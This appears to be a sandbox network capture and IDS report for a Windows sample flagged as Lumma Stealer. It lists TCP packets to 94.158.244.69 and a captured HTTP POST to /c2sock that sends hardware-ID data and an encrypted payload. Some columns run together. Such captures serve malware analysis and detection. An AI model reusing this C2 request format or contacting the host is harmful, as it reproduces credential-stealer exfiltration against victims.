2024-11-13T10:56:32.618908+0100 | 2043206 | ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M2 | 1 | 192.168.2.8 | 49721 | 94.158.244.69 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Nov 13, 2024 10:55:32.525818110 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.525945902 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.574251890 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.574316978 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.623384953 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.623460054 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.675578117 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.675695896 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.727227926 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.727322102 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.779911995 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.780097961 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.831491947 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.831617117 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.877656937 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.877785921 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.925707102 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.925787926 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:32.973805904 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:32.973922014 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.025806904 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.025993109 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.073609114 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.073734999 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.125701904 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.125840902 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.177690983 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.177798986 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.229795933 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.229871988 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.277514935 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.277582884 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.325741053 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.325798988 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.377716064 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.377861977 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.425654888 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.425759077 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.473603964 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.473932981 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.521555901 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.521666050 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.569483995 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.569561005 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.617465019 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.617567062 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.665632963 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.665746927 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.713617086 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.713735104 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.765733004 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.765994072 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.813690901 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.813829899 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.861609936 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.861701012 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.913518906 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.913657904 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:33.965544939 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:33.965610027 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.013698101 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.013811111 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.061541080 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.061738968 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.109529972 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.109608889 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.157587051 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.157876968 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.205861092 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.206125975 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.253453970 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.253562927 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.301587105 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.301660061 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.353949070 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.354094982 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.406111956 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.406259060 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.453567028 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.453676939 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.501481056 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.501528025 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.550652027 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.550715923 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.598159075 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.598285913 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.649688005 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.649779081 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.703100920 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.703222036 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.749491930 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.749645948 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.808661938 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.808734894 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.860554934 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.860610008 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.913536072 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.913605928 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:34.984792948 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:34.984859943 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.042498112 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.042587996 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.090212107 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.090291023 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.141807079 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.141882896 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.190093040 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.190167904 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.237761974 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.238054037 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.285773993 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.286053896 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.334119081 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.334228039 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.385787010 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.385931015 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.437597036 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.437715054 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.486393929 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.486555099 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.533603907 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.533729076 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.581623077 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.581692934 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.629690886 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.629792929 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.687733889 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.687834024 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.755968094 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.756047964 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.804630995 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.804706097 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.856118917 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.856311083 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.905597925 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.905850887 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:35.962383986 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:35.962466955 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.012538910 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.012675047 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.061717033 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.061861992 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.109647036 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.109786987 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.159933090 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.160048008 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.209794998 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.209896088 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.258187056 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.258394957 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.312061071 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.312257051 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.365536928 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.365632057 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.417045116 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.417110920 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.465673923 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.465779066 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.518044949 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.518131971 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.570043087 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.570240974 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.618827105 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.619035959 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.666529894 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.666702032 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.713618994 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.713711977 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.765539885 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.765721083 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.813925028 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.813994884 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.865546942 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.865647078 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.919538975 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.919706106 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:36.971240997 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:36.971378088 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.019296885 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.019352913 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.066090107 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.066169024 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.115348101 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.115544081 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.171571016 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.171783924 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.224251032 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.224348068 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.285722017 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.285900116 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.336052895 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.336143970 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.391911983 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.391989946 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.437589884 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.437670946 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.486743927 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.486866951 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.535474062 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.535540104 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.585720062 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.585773945 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.645737886 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.645807028 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.712234974 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.712368011 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.769706964 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.769819021 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.836467981 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.836596012 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.888592005 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.888761044 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.938942909 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.939045906 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:37.985641956 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:37.985738039 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.034513950 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.034662962 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.081949949 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.082094908 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.129697084 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.129793882 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.178145885 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.178222895 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.225814104 CET804971594.158.244.69192.168.2.8
                                                        Nov 13, 2024 10:55:38.225872040 CET4971580192.168.2.894.158.244.69
                                                        Nov 13, 2024 10:55:38.273592949 CET804971594.158.244.69192.168.2.8
Nov 13, 2024 10:55:38.273663998 CET  49715  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:38.324330091 CET  80     49715  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:38.324449062 CET  49715  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:38.373800039 CET  80     49715  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:38.373945951 CET  49715  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:38.427356005 CET  80     49715  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:38.427448034 CET  49715  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:38.473905087 CET  80     49715  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:38.474026918 CET  49715  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:38.523894072 CET  80     49715  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:38.523988962 CET  49715  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:38.570918083 CET  80     49715  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:38.571166992 CET  49715  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:38.621869087 CET  80     49715  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:38.621942043 CET  49715  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:38.671084881 CET  80     49715  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:38.671147108 CET  49715  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:38.717699051 CET  80     49715  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:38.717758894 CET  49715  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:38.765822887 CET  80     49715  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:38.765928984 CET  49715  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:38.786639929 CET  80     49715  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:39.820585012 CET  49716  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:39.827023029 CET  80     49716  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:39.827326059 CET  49716  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:39.827390909 CET  49716  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:39.827801943 CET  49716  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:39.832604885 CET  80     49716  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:39.832813978 CET  80     49716  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:48.326785088 CET  80     49716  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:48.326883078 CET  49716  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:48.327023029 CET  49716  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:48.335414886 CET  80     49716  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:48.608906984 CET  49717  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:48.615736961 CET  80     49717  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:48.616281986 CET  49717  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:48.616439104 CET  49717  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:48.616862059 CET  49717  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:48.622174978 CET  80     49717  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:48.622984886 CET  80     49717  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:57.094016075 CET  80     49717  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:57.094150066 CET  49717  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:57.094232082 CET  49717  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:57.099153042 CET  80     49717  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:57.500457048 CET  49718  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:57.724580050 CET  80     49718  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:57.724706888 CET  49718  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:57.724904060 CET  49718  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:57.725347042 CET  49718  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:55:57.729938984 CET  80     49718  94.158.244.69  192.168.2.8
Nov 13, 2024 10:55:57.730076075 CET  80     49718  94.158.244.69  192.168.2.8
Nov 13, 2024 10:56:06.203653097 CET  80     49718  94.158.244.69  192.168.2.8
Nov 13, 2024 10:56:06.203780890 CET  49718  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:06.203780890 CET  49718  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:06.208606958 CET  80     49718  94.158.244.69  192.168.2.8
Nov 13, 2024 10:56:06.574736118 CET  49719  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:06.579714060 CET  80     49719  94.158.244.69  192.168.2.8
Nov 13, 2024 10:56:06.579811096 CET  49719  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:06.579957008 CET  49719  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:06.580327034 CET  49719  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:06.584723949 CET  80     49719  94.158.244.69  192.168.2.8
Nov 13, 2024 10:56:06.585133076 CET  80     49719  94.158.244.69  192.168.2.8
Nov 13, 2024 10:56:15.057467937 CET  80     49719  94.158.244.69  192.168.2.8
Nov 13, 2024 10:56:15.057549000 CET  49719  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:15.057626009 CET  49719  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:15.062511921 CET  80     49719  94.158.244.69  192.168.2.8
Nov 13, 2024 10:56:15.353727102 CET  49720  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:15.359919071 CET  80     49720  94.158.244.69  192.168.2.8
Nov 13, 2024 10:56:15.360023022 CET  49720  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:15.360138893 CET  49720  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:15.360508919 CET  49720  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:15.366242886 CET  80     49720  94.158.244.69  192.168.2.8
Nov 13, 2024 10:56:15.366858006 CET  80     49720  94.158.244.69  192.168.2.8
Nov 13, 2024 10:56:23.838267088 CET  80     49720  94.158.244.69  192.168.2.8
Nov 13, 2024 10:56:23.838413954 CET  49720  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:23.838460922 CET  49720  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:23.843358994 CET  80     49720  94.158.244.69  192.168.2.8
Nov 13, 2024 10:56:24.122925043 CET  49721  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:24.127931118 CET  80     49721  94.158.244.69  192.168.2.8
Nov 13, 2024 10:56:24.127994061 CET  49721  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:24.128138065 CET  49721  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:24.128518105 CET  49721  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:24.133198023 CET  80     49721  94.158.244.69  192.168.2.8
Nov 13, 2024 10:56:24.133855104 CET  80     49721  94.158.244.69  192.168.2.8
Nov 13, 2024 10:56:32.618824005 CET  80     49721  94.158.244.69  192.168.2.8
Nov 13, 2024 10:56:32.618907928 CET  49721  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:32.618973017 CET  49721  80     192.168.2.8    94.158.244.69
Nov 13, 2024 10:56:32.624000072 CET  80     49721  94.158.244.69  192.168.2.8
• 94.158.244.69
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.8  49707        94.158.244.69   80                7500  C:\Users\user\Desktop\I2BJhmJou4.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 13, 2024 10:54:25.872971058 CET  190                OUT        POST /c2sock HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
    User-Agent: TeslaBrowser/5.5
    Content-Length: 16465
    Host: 94.158.244.69
Nov 13, 2024 10:54:25.873425007 CET  11124              OUT        Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;
Nov 13, 2024 10:54:25.877830982 CET  1236               OUT        Data Raw: 49 0f 2e 26 89 86 bb a8 52 0c 3f 7d 83 4d 58 df 15 7e 4d 5a 0f 4e 8b d2 cc 4c 66 bf 18 31 16 15 6f b9 0e 66 a5 f8 d0 b3 b1 86 64 54 46 1e 63 26 01 a9 45 9b b6 3b af d9 cc 1a e2 8b 33 9f df 0f ce 7a fe 44 ee 6f 43 22 06 61 37 cd 48 12 85 42 6b eb
    Data Ascii: I.&R?}MX~MZNLf1ofdTFc&E;3zDoC"a7HBk4;`{B~6K`{b,%JjLmoR?;AswFgbs!NN7<PR`ASff5q(cfE+)jTq8"mP>DiEQ
Nov 13, 2024 10:54:25.878357887 CET  4105               OUT        Data Raw: 00 00 00 e9 03 fb 7f 00 00 00 20 7d 60 ff 0f 00 00 00 a4 0f ec ff 01 00 00 80 f4 81 f5 1f 00 00 00 48 1f 58 ff 01 00 00 80 f4 81 df ff 01 00 00 80 f4 91 1f 78 53 c8 65 35 41 fc 87 dc ff e6 e6 b3 5a ff 5f 0e d4 04 00 c0 d7 c5 fe dc 07 a2 f4 e4 49
